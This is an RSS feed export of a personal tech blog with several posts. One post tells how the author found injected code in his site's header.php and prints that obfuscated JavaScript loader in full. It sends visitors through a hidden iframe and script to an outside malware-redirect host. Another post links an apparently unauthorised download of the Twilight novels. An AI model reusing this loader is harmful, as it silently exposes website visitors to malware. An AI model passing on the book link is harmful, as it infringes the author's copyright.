			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=superficial+growth&amp;du=http://magicalharsh.com/blog/superficial-growth/&amp;cn=just%20gone%20through%20that%20india%20would%20be%20the%20superpower%20in%202020%20and%20the%20strongest%20economy%20in%202050%20.%0D%0A%0D%0Ai%20think%20that%20from%20the%20past%203%20years%20i%20am%20hearing%20it%20for%20the%20240th%20time%20to%20be%20precise%0D%0A%0D%0Ahave%20no%20idea%20how%20predictions%20are%20made%3Fwhether%20to%20keep%C2%A0%20u%20the%20global%20image%20of%20india%20in%20global%20market%20or%20showcasin" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li>No related posts.</li>
	</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/superficial-growth/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Trouble with js/downloader.agent</title>
		<link>http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/</link>
		<comments>http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 10:58:08 +0000</pubDate>
		<dc:creator>Harsh Singh</dc:creator>
				<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[avg]]></category>
		<category><![CDATA[header.php]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[js/downloader.agent]]></category>
		<category><![CDATA[Trojan]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[wordpress virus]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=677</guid>
		<description><![CDATA[
			
				
			
		
I don&#8217;t the how it happen , but since last few days whenever I opened my site , my AVG would pop up warning about some malicious javascript . I never paid much attention to this , afterall they even detect harmless keygens as trojans too      . So I never took this seriously [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Ftrouble-with-jsdownloader-agent%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Ftrouble-with-jsdownloader-agent%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>I don&#8217;t the how it happen , but since last few days whenever I opened my site , my AVG would pop up warning about some malicious javascript . I never paid much attention to this , afterall they even detect harmless keygens as trojans too  <img src='http://magicalharsh.com/blog/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' />    . So I never took this seriously , hoping that everything will be fine in few days ( height of optimism ) .</p>
<p>But AVG kept on threatening me , and when my readers complained about this too , I got a little worried . I knew there was a javascript , and I know it was something related to a downloader agent . I knew where to start from . I google it straight away ( Bless google . Without you , we would be helpless ) . But mr. google failed as the only information I could gather that it was some phishing attack ( XSS , iframe ) but didn&#8217;t knew how to fix this problem .</p>
<p>Starting from scratch , I checked all my files for something &#8220;malicious&#8221; . And guess what I got . This bit of code was hiding in header.php .</p>
<p><textarea cols="50" rows="30"> s cript language=javascript&gt;&lt;!&#8211; document.write(unescape(&#8216;%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E&#8217;));dF(&#8216;%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1&#8242;) // &#8211;&gt;&lt;/mce:script&gt;&lt;br /&gt; </textarea></p>
<p>No idea where this thing came from . Lesson learnt : always take your antivirus seriously and a XSS / iframe attack even more seriously .</p>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/&amp;title=Trouble+with+js%2Fdownloader.agent" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/&amp;t=Trouble+with+js%2Fdownloader.agent" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=Trouble+with+js%2Fdownloader.agent+-+http://b2l.me/pt7kt+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/&amp;title=Trouble+with+js%2Fdownloader.agent&amp;summary=I%20don%27t%20the%20how%20it%20happen%20%2C%20but%20since%20last%20few%20days%20whenever%20I%20opened%20my%20site%20%2C%20my%20AVG%20would%20pop%20up%20warning%20about%20some%20malicious%20javascript%20.%20I%20never%20paid%20much%20attention%20to%20this%20%2C%20afterall%20they%20even%20detect%20harmless%20keygens%20as%20trojans%20too%C2%A0%20%3AP%C2%A0%C2%A0%20.%20So%20I%20never%20took%20this%20seriously%20%2C%20hoping%20that%20everyt&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=Trouble+with+js%2Fdownloader.agent&amp;du=http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/&amp;cn=I%20don%27t%20the%20how%20it%20happen%20%2C%20but%20since%20last%20few%20days%20whenever%20I%20opened%20my%20site%20%2C%20my%20AVG%20would%20pop%20up%20warning%20about%20some%20malicious%20javascript%20.%20I%20never%20paid%20much%20attention%20to%20this%20%2C%20afterall%20they%20even%20detect%20harmless%20keygens%20as%20trojans%20too%C2%A0%20%3AP%C2%A0%C2%A0%20.%20So%20I%20never%20took%20this%20seriously%20%2C%20hoping%20that%20everyt" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li><a href="http://magicalharsh.com/blog/virus-a-folder-is-automatically-created-within-all-the-folders-with-the-same-name-as-parent-folder/" title="Virus :: A folder is automatically created within all the folders with the same name as parent folder (March 7, 2009)">Virus :: A folder is automatically created within all the folders with the same name as parent folder</a> </li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/trouble-with-jsdownloader-agent/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Jagriti &#8216;10 :: RKGIT&#8217;s Annual Tech Fest</title>
		<link>http://magicalharsh.com/blog/jagriti-10-rkgits-annual-tech-fest/</link>
		<comments>http://magicalharsh.com/blog/jagriti-10-rkgits-annual-tech-fest/#comments</comments>
		<pubDate>Fri, 12 Feb 2010 14:48:16 +0000</pubDate>
		<dc:creator>Harsh Singh</dc:creator>
				<category><![CDATA[technical fest]]></category>
		<category><![CDATA[college fest]]></category>
		<category><![CDATA[jagriti]]></category>
		<category><![CDATA[jagriti 10]]></category>
		<category><![CDATA[ncr fest]]></category>
		<category><![CDATA[RKGIt]]></category>
		<category><![CDATA[techfest]]></category>
		<category><![CDATA[thejagriti]]></category>
		<category><![CDATA[UPTU]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=674</guid>
		<description><![CDATA[
			
				
			
		
JAGRITI has been an event regularly followed by the technical fraternity and deemed to regressively inculcate scientific and technical temper in the budding technocrats of the nation. Various competitions and workshops at the event give vent to the technical skills acquired by the students and let them compete with the best in the business, thus [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fjagriti-10-rkgits-annual-tech-fest%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fjagriti-10-rkgits-annual-tech-fest%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p><strong><a href="http://www.thejagriti.com/">JAGRITI</a></strong> has been an event regularly followed by the technical fraternity and deemed to regressively inculcate scientific and technical temper in the budding technocrats of the nation. Various competitions and workshops at the event give vent to the technical skills acquired by the students and let them compete with the best in the business, thus giving insight to their level of skill and the job needed to be done for enriching the quantum of knowledge.</p>
<p>â€œ<span style="text-decoration: underline;">Shrinking the technological cosmos</span>!â€ has achieved its true meaning and implementation after Jagriti only.</p>
<p>The events are judged by highly accredited individuals from respective fields. The competition is tough and demanding. We, hereby invite you to this tussle of minds and intellect.</p>
<p style="text-align: center;"><img class="aligncenter" src="http://magicalharsh.files.wordpress.com/2010/02/logo.png?w=500" alt="" /></p>
<p>Jagriti is to wake all up, gear up and generate the intellect as famously said&#8230;<strong>&#8220;Intellectuals solve problems, geniuses prevent them.&#8221;</strong></p>
<p><strong><span style="font-weight: normal;">For more information visit the <a href="http://www.thejagriti.org/">Jagriti Blog</a></span></strong></p>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/jagriti-10-rkgits-annual-tech-fest/&amp;title=Jagriti+%2710+%3A%3A+RKGIT%27s+Annual+Tech+Fest" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/jagriti-10-rkgits-annual-tech-fest/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/jagriti-10-rkgits-annual-tech-fest/&amp;t=Jagriti+%2710+%3A%3A+RKGIT%27s+Annual+Tech+Fest" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=Jagriti+%2710+%3A%3A+RKGIT%27s+Annual+Tech+Fest+-+http://b2l.me/pt8ez+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/jagriti-10-rkgits-annual-tech-fest/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/jagriti-10-rkgits-annual-tech-fest/&amp;title=Jagriti+%2710+%3A%3A+RKGIT%27s+Annual+Tech+Fest&amp;summary=JAGRITI%20has%20been%20an%20event%20regularly%20followed%20by%20the%20technical%20fraternity%20and%20deemed%20to%20regressively%20inculcate%20scientific%20and%20technical%20temper%20in%20the%20budding%20technocrats%20of%20the%20nation.%20Various%20competitions%20and%20workshops%20at%20the%20event%20give%20vent%20to%20the%20technical%20skills%20acquired%20by%20the%20students%20and%20let%20t&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=Jagriti+%2710+%3A%3A+RKGIT%27s+Annual+Tech+Fest&amp;du=http://magicalharsh.com/blog/jagriti-10-rkgits-annual-tech-fest/&amp;cn=JAGRITI%20has%20been%20an%20event%20regularly%20followed%20by%20the%20technical%20fraternity%20and%20deemed%20to%20regressively%20inculcate%20scientific%20and%20technical%20temper%20in%20the%20budding%20technocrats%20of%20the%20nation.%20Various%20competitions%20and%20workshops%20at%20the%20event%20give%20vent%20to%20the%20technical%20skills%20acquired%20by%20the%20students%20and%20let%20t" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li>No related posts.</li>
	</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/jagriti-10-rkgits-annual-tech-fest/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Solving Counter Strike + IDM problem</title>
		<link>http://magicalharsh.com/blog/solving-counter-strike-idm-problem/</link>
		<comments>http://magicalharsh.com/blog/solving-counter-strike-idm-problem/#comments</comments>
		<pubDate>Mon, 02 Nov 2009 16:50:32 +0000</pubDate>
		<dc:creator>Harsh Singh</dc:creator>
				<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[counter strike]]></category>
		<category><![CDATA[idm]]></category>
		<category><![CDATA[internet download manager]]></category>
		<category><![CDATA[problem]]></category>
		<category><![CDATA[troubleshoot]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=670</guid>
		<description><![CDATA[
			
				
			
		
The reason Counter Strike freezes when you have got IDM installed in your system is due to IEMonitor.exe ( which is used for browser integration )
Solution :

In Internet Download Manager, click Downloading -&#62; Options -&#62; General.
There, you have to uncheck the intergration for IE and IE based browsers and secondly, uncheck the &#8220;Run module for [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fsolving-counter-strike-idm-problem%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fsolving-counter-strike-idm-problem%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>The reason Counter Strike freezes when you have got IDM installed in your system is due to IEMonitor.exe ( which is used for browser integration )</p>
<p><span style="text-decoration: underline;"><strong>Solution :<br />
</strong></span></p>
<p>In Internet Download Manager, click Downloading -&gt; Options -&gt; General.</p>
<p>There, you have to uncheck the intergration for IE and IE based browsers and secondly, uncheck the &#8220;Run module for monitoring in IE-based browsers (MSN, Avant&#8230;)&#8221; and press Ok. &lt;&#8211; This actually stops launching IEMonitor.exe and hence solves it all.</p>
<p style="text-align: center;"><a href="http://img208.imageshack.us/img208/4581/iemonitor3.png"><img class="aligncenter" src="http://img208.imageshack.us/img208/4581/iemonitor3.png" alt="" width="326.470588235" height="400" /></a></p>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/solving-counter-strike-idm-problem/&amp;title=Solving+Counter+Strike+%2B+IDM+problem" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/solving-counter-strike-idm-problem/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/solving-counter-strike-idm-problem/&amp;t=Solving+Counter+Strike+%2B+IDM+problem" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=Solving+Counter+Strike+%2B+IDM+problem+-+http://b2l.me/pu43m+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/solving-counter-strike-idm-problem/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/solving-counter-strike-idm-problem/&amp;title=Solving+Counter+Strike+%2B+IDM+problem&amp;summary=The%20reason%20Counter%20Strike%20freezes%20when%20you%20have%20got%20IDM%20installed%20in%20your%20system%20is%20due%20to%20IEMonitor.exe%20%28%20which%20is%20used%20for%20browser%20integration%20%29%0D%0A%0D%0ASolution%20%3A%0D%0A%0D%0A%0D%0AIn%20Internet%20Download%20Manager%2C%20click%20Downloading%20-%26gt%3B%20Options%20-%26gt%3B%20General.%0D%0A%0D%0AThere%2C%20you%20have%20to%20uncheck%20the%20intergration%20for%20IE%20and&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=Solving+Counter+Strike+%2B+IDM+problem&amp;du=http://magicalharsh.com/blog/solving-counter-strike-idm-problem/&amp;cn=The%20reason%20Counter%20Strike%20freezes%20when%20you%20have%20got%20IDM%20installed%20in%20your%20system%20is%20due%20to%20IEMonitor.exe%20%28%20which%20is%20used%20for%20browser%20integration%20%29%0D%0A%0D%0ASolution%20%3A%0D%0A%0D%0A%0D%0AIn%20Internet%20Download%20Manager%2C%20click%20Downloading%20-%26gt%3B%20Options%20-%26gt%3B%20General.%0D%0A%0D%0AThere%2C%20you%20have%20to%20uncheck%20the%20intergration%20for%20IE%20and" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li><a href="http://magicalharsh.com/blog/windows-startup-booster/" title="Windows Startup Booster (June 27, 2008)">Windows Startup Booster</a> </li>
	<li><a href="http://magicalharsh.com/blog/unable-to-open-d-by-double-clicking/" title="Unable to open D: by double clicking (October 3, 2008)">Unable to open D: by double clicking</a> </li>
	<li><a href="http://magicalharsh.com/blog/track-your-pc/" title="Track Your PC (June 6, 2008)">Track Your PC</a> </li>
	<li><a href="http://magicalharsh.com/blog/speed-up-the-start-menu/" title="Speed up the Start Menu (August 1, 2008)">Speed up the Start Menu</a> </li>
	<li><a href="http://magicalharsh.com/blog/speed-up-the-start-menu-2/" title="Speed up the Start Menu (August 6, 2008)">Speed up the Start Menu</a> </li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/solving-counter-strike-idm-problem/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Twilight Saga :: Download</title>
		<link>http://magicalharsh.com/blog/the-twilight-saga-download/</link>
		<comments>http://magicalharsh.com/blog/the-twilight-saga-download/#comments</comments>
		<pubDate>Fri, 16 Oct 2009 22:17:33 +0000</pubDate>
		<dc:creator>Harsh Singh</dc:creator>
				<category><![CDATA[E books]]></category>
		<category><![CDATA[breaking dawn]]></category>
		<category><![CDATA[eclipse]]></category>
		<category><![CDATA[edward cullen]]></category>
		<category><![CDATA[new moon]]></category>
		<category><![CDATA[stephanie meyer]]></category>
		<category><![CDATA[twilight saga]]></category>
		<category><![CDATA[twilight series]]></category>
		<category><![CDATA[vampire]]></category>
		<category><![CDATA[werewolf]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=668</guid>
		<description><![CDATA[
			
				
			
		
Twilight is a series of four vampire-based fantasy/romance novels by American author Stephenie Meyer. It charts a period in the life of Isabella &#8220;Bella&#8221; Swan, a teenage girl who moves to Forks, Washington and falls in love with a 104-year-old vampire named Edward Cullen. The series is told primarily from Bella&#8217;s point of view, with [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fthe-twilight-saga-download%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fthe-twilight-saga-download%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>Twilight is a series of four vampire-based fantasy/romance novels by American author Stephenie Meyer. It charts a period in the life of Isabella &#8220;Bella&#8221; Swan, a teenage girl who moves to Forks, Washington and falls in love with a 104-year-old vampire named Edward Cullen. The series is told primarily from Bella&#8217;s point of view, with the epilogue of Eclipse and Part II of Breaking Dawn being told from the viewpoint of characterJacob Black, a werewolf. The unpublished Midnight Sun is a retelling of the first book, Twilight, from Edward Cullen&#8217;s point of view.</p>
<p>Click on the image to download all the four books .</p>
<p style="text-align: center;"><a href="http://freakytrix.googlepages.com/Twilightseries.zip"><img class="aligncenter" src="http://img99.imageshack.us/img99/6905/twilightcoverw.jpg" alt="" width="400" height="400" /></a></p>


<!-- Begin SexyBookmarks Menu Code -->
<div class="sexy-bookmarks sexy-bookmarks-expand sexy-bookmarks-bg-wealth">
<ul class="socials">
		<li class="sexy-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://magicalharsh.com/blog/the-twilight-saga-download/&amp;title=The+Twilight+Saga+%3A%3A+Download" rel="nofollow" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="sexy-technorati">
			<a href="http://technorati.com/faves?add=http://magicalharsh.com/blog/the-twilight-saga-download/" rel="nofollow" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="sexy-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://magicalharsh.com/blog/the-twilight-saga-download/&amp;t=The+Twilight+Saga+%3A%3A+Download" rel="nofollow" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="sexy-twitter">
			<a href="http://twitter.com/home?status=The+Twilight+Saga+%3A%3A+Download+-+http://b2l.me/pu43n+(via+@magicalharsh)&amp;source=shareaholic" rel="nofollow" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="sexy-comfeed">
			<a href="http://magicalharsh.com/blog/the-twilight-saga-download/feed" rel="nofollow" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="sexy-linkedin">
			<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magicalharsh.com/blog/the-twilight-saga-download/&amp;title=The+Twilight+Saga+%3A%3A+Download&amp;summary=Twilight%20is%20a%20series%20of%20four%20vampire-based%20fantasy%2Fromance%20novels%20by%20American%20author%20Stephenie%20Meyer.%20It%20charts%20a%20period%20in%20the%20life%20of%20Isabella%20%22Bella%22%20Swan%2C%20a%20teenage%20girl%20who%20moves%20to%20Forks%2C%20Washington%20and%20falls%20in%20love%20with%20a%20104-year-old%20vampire%20named%20Edward%20Cullen.%20The%20series%20is%20told%20primarily&amp;source=Dark Horizon" rel="nofollow" title="Share this on LinkedIn">Share this on LinkedIn</a>
		</li>
		<li class="sexy-orkut">
			<a href="http://promote.orkut.com/preview?nt=orkut.com&amp;tt=The+Twilight+Saga+%3A%3A+Download&amp;du=http://magicalharsh.com/blog/the-twilight-saga-download/&amp;cn=Twilight%20is%20a%20series%20of%20four%20vampire-based%20fantasy%2Fromance%20novels%20by%20American%20author%20Stephenie%20Meyer.%20It%20charts%20a%20period%20in%20the%20life%20of%20Isabella%20%22Bella%22%20Swan%2C%20a%20teenage%20girl%20who%20moves%20to%20Forks%2C%20Washington%20and%20falls%20in%20love%20with%20a%20104-year-old%20vampire%20named%20Edward%20Cullen.%20The%20series%20is%20told%20primarily" rel="nofollow" title="Promote this on Orkut">Promote this on Orkut</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>
<!-- End SexyBookmarks Menu Code -->


	<h4>Related posts</h4>
	<ul class="st-related-posts">
	<li>No related posts.</li>
	</ul>

]]></content:encoded>
			<wfw:commentRss>http://magicalharsh.com/blog/the-twilight-saga-download/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Use laalten .. save Energy .. !!</title>
		<link>http://magicalharsh.com/blog/use-laalten-save-energy/</link>
		<comments>http://magicalharsh.com/blog/use-laalten-save-energy/#comments</comments>
		<pubDate>Fri, 16 Oct 2009 17:03:30 +0000</pubDate>
		<dc:creator>Harsh Singh</dc:creator>
				<category><![CDATA[Web]]></category>
		<category><![CDATA[eco friendly]]></category>
		<category><![CDATA[electric power]]></category>
		<category><![CDATA[energy]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[laalten]]></category>
		<category><![CDATA[power saving]]></category>
		<category><![CDATA[search engine]]></category>

		<guid isPermaLink="false">http://magicalharsh.com/blog/?p=665</guid>
		<description><![CDATA[
			
				
			
		
There is no need reminding everyone how crucial electric power is in current scenario . Rome was not built in a day , neither will this power be solved in a day . It needs continous effort of all of us in the direction of progress . We can&#8217;t hope to change the very top [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fuse-laalten-save-energy%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fmagicalharsh.com%2Fblog%2Fuse-laalten-save-energy%2F&amp;source=magicalharsh&amp;style=normal" height="61" width="50" /><br />
			</a>
		</div>
<p>There is no need reminding everyone how crucial electric power is in current scenario . Rome was not built in a day , neither will this power be solved in a day . It needs continous effort of all of us in the direction of progress . We can&#8217;t hope to change the very top and hope for this change to trickle down the system . We need to change the base , no matter how insignificant it may be .</p>
<p>One of the ways through which we can save a lot of power while using the web is as follows :</p>
<p>There is point denying that we put google search engine to a lot of use in our day to day life . We love to google things , don&#8217;t we .</p>
<p>A research suggested that a black version of the Google would save a lot of energy.<br />
<a href="http://www.laalten.com/" target="_blank">www.laalten.com </a>(<a href="http://www.laalten.com/" target="_blank"> http://www.laalten.com</a> was created inspired by this theory)<br />
<a href="http://www.laalten.com/" target="_blank"></a></p>
<p style="text-align: center;"><a href="http://img62.imageshack.us/img62/2156/39339130.jpg"><img class="aligncenter" src="http://img62.imageshack.us/img62/2156/39339130.jpg" alt="" width="400" height="250" /></a></p>
<p>This  is a search engine powered by Google.<br />
It saves energy because the screen is predominantly black.</p>
<p>Join your hands in this enegry saving mission.</p>
<p>Always use this site for search and make sure to SET IT AS YOUR HOME PAGE.</p>
<p>Please spread the good word among your friends, neighbours.</p>
